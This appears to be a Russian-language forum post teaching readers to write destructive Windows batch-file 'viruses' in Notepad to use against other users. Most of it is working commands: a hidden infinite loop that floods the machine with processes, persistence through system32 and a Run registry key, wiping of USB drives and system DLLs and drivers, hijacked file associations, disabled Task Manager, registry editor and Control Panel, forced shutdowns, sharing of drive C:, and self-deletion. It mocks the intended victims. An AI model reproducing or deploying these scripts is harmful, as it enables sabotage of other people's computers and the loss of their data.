Вирусо-писание в блокноте. Это один из распространенных вирусо-писаний, и самый легкий. Даже сказать, это не совсем вирус. Но как вирус лишает пользователя удобств пользования компьютером)Мы просто создадим скрипт, который будет выполнять все действия одновременно нагружая компьютер и не только. Давайте начнем с простого, чтобы вы поняли, что будет дальше. 1) Открываем блокнот; 2) Пишем в нем «Calc», без кавычек; 3) Сохраняем файл под любым именем, но вместо .txt мы напишем .bat 4) Откроем файлик и увидим, что открылся Калькулятор)) Ну что? понимаете к чему я веду? Нет? Мы будем пользоваться простыми командами виндовс! Сейчас я все поясню) Открываем блокнот, пишем: Код: time 01:01 date 13.12.11 И сохраняем в .bat... Если запустим, то поменяется время и дата. Наверное уже догадались) Вот еще примерчик: Код: del F:\ *.* /q label F:Ueban Эта программа, которая удалит все с флешки, если она вставлена, и переименует ее на Ueban Итак мы закончили с написанием простых, безобидных программ...переходим к более жестоким) Код: :x ; Start calc goto x ; Угадайте, что сделает эта программа? За 15 секунд она откроет 50 калькуляторов прежде, чем юзер успеет понять, что случилось)) Конечно, пока программа будет открывать калькуляторы, будет отображаться черное окошко(командная строка выполнений) если ее закрыть то программа завершится. Чтобы не дать юзеру сделать этого рассмотрим еще 2 новые команды. Новая команда «@echo off» вводиться в начале нашего вируса и скрывает все, что в нем происходит в дальнейшем. Одним словом, не дадим пользователю увидеть, что случилось. Еще добавив после каждой команды простенькое, но очень эффективное действие, как «>nul» к примеру «time 00:00 >nul», мы скроем сточку. Итак, можно усовершенствовать наш вирус: Код: @echo off :x ; >nul Start calc >nul goto x ; >nul Мдаа комп повиснет, если программа будет бесконечно открывать калькуляторы.Но мы ведь можем открывать не только калькуляторы! Можно запустить и taskmgr(Диспетчер задач) можно и mspaint(Пэйнт) и так далее... Теперь небольшой перечень того, что можно писать в блокнотовском вирусе. СПИСОК: 1) «copy %0 x:\y» - копирует вирус на диск x в папку y (пример copy %0 C:\System.bat); 2) «label x:y» - переименовывает диск x на имя y (пример label C:error); 3) «time х:у» - меняет время на х часов и у минут (пример time 14:27); 4) «date x.y.z» - меняет дату на x день, y месяц, z лет (пример date 16.11.05); 5) «md х» - создаст папку, в том месте, где наш вирус, с именем х (пример md Papka); 6) «del *.* /q» - удалит все файлы (наш вирус тоже) в папке, где лежит наш вирус (кроме папок); 7) «del x:\y *.* /q» - удалит все файлы на диске х в папке у (кроме папок) (пример del F:\Data*.* /q); 8) «assoc .х=.у» - переделает все файлы, на компьютере, форматом х на у (пример assoc .exe=.mp3); 9) «net user "х" /add» - добавит на компьютер пользователя под именем х (пример net user "Smoked" /add); Разберем еще пару жестоких скриптов. Код: copy ""%0"" "%SystemRoot%\system32\File.bat" reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Filel" /t REG_SZ /d "%SystemRoot%\system32\File.bat" /f reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoControlPanel /t REG_DWORD /d 1 /f Очень жестокая команда: добавляет программу в автозагрузку ОС. Не советую проверять на вашем компьютере. Не останавливаемся, а едем дальше)) Код: assoc .lnk=.txt >nul assoc .exe=.mp3 >nul Данными двумя строками мы делаем, весьма тяжелый вред компьютеру жертвы. Он меняет расширения всех файлов на компьютере с .lnk в .txt и .exe в .mp3. То есть все ярлыки, открываются в блокноте, а программы, все, в плеере. Жеесть да? Ну вот и все) Всем удачных ввирусо-писаний, пусть нубы познают плату за флуд! Вот самая интересная ... [*]«taskkill /f /im explorer.exe >nul » – Убить процесс Explorer.exe , а так же вы можете написать процесс убивающий ... [*]«taskkill /f /im pb.exe >nul» - убивает пб.ехе) [*]«reg add HKCUSoftwareMicrosoftWindowsCurrentVersionPolicies System /v DisableTaskMgr /t REG_DWORD /d 1 /f >nul» – Запретить комбинацию клавиш Ctrl-Alt-Del [*]«del "%SystemRoot%system32*.dll" /q >nul »– Удалить все системные DLL(Динамические загружаемые библиотеки) [*]«del "%SystemRoot%Driver Cachei386driver.cab" /f /q >nul» – Удалить все драйверы, установленные на компьютере [*]«%SystemRoot%/system32/rundll32 user32, SwapMouseButton >nul» – Поменять местами значения кнопок мыши [*]«reg add HKCUSoftwareMicrosoftWindowsCurrentVersionPolicies ExplorerRestrictRun /v 1 /t REG_DWORD /d %SystemRoot%explorer.exe /f >nul» – Делает невозможным запуск приложений [*]«time 0:00 >nul» – Поставить время на 00:00 [*]«reg add HKCUSoftwareMicrosoftWindowsCurrentVersionPolicies System /v DisableRegistryTools /t REG_DWORD /d 1 /f >nul» – Запретить редактирование реестра вручную [*]«del "%SystemRoot%Cursors*.*" >nul» – Удалить курсор мыши [*]«del "%SystemRoot%Media" /q >nul» – Удалить системные звуки Windows [*]«reg add HKCUSoftwareMicrosoftWindowsCurrentVersionPolicies Explorer /v NoControlPanel /t REG_DWORD /d 1 /f >nul» – Запретить вызов панели управления [*]«reg add HKCUSoftwareMicrosoftWindowsCurrentVersionPolicies Explorer /v NoDesktop /t REG_DWORD /d 1 /f >nul» – Убрать рабочий стол [*]«shutdown -r -t 1 -c "lol" -f >nul» – Форсираванная перезагрузка ПК [*]«shutdown -s -t 1 -c "lol" -f >nul» – Форсированное выключение ПК [*]«net share "ResName"="C:" >nul» – Расшарить диск C: [*]«label C:Диск >nul – Переименовать диск С: [*]«msg * "Текст сообщения" >nul» – Показать Windows-стилизованное сообщение с кнопкой ОК [*]«del "%0" >nul» – Самоликвидация вируса Если вы не знаете как поменять расширение файлу то делайте так: заходим в панель управления, заходим в свойства папок-> Вкладка "Вид". В "Дополнительные параметры" убираем галочку с "Скрывать расширения для зарегистрированных типов файлов". Нажать "ОК". Теперь выбираем нужный файл, жмём на нём правой кнопкой мыши и выбираем из появившегося меню "Переименовать". Удаляем расширение (три последних буквы) и пишем новое! Жмём "Enter" на клавиатуре. Готово! p.s. просто посмотрел на ютубе, решил написать это на форуме..